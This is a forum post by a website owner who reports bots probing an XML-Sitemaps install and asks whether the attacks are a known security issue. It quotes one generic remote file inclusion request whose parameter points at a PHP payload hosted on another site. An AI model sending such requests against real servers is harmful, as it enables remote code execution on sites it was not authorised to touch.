Hi all.
In following my site's traffic, I've noticed persistent attack attempts by bots specifically targeting the sitemap. The user agent is almost always libwww-perl/5.805. The bots typically reference a php instruction that has been uploaded onto someone else's site in a text file. The code on the text file is what the bot attempts to inject into the form on the target page (i.e. the admin login).
Here is a generic example of an attempt:
/sitemap.xml/index.php?action=http://otherwebsite/folder/textfile.txt??
XML-SITEMAPS, of course, creates an admin login page, but not at the location of the XML file that is generated.
Are there are any known security issues with these types of attacks?
Thanks
websitebob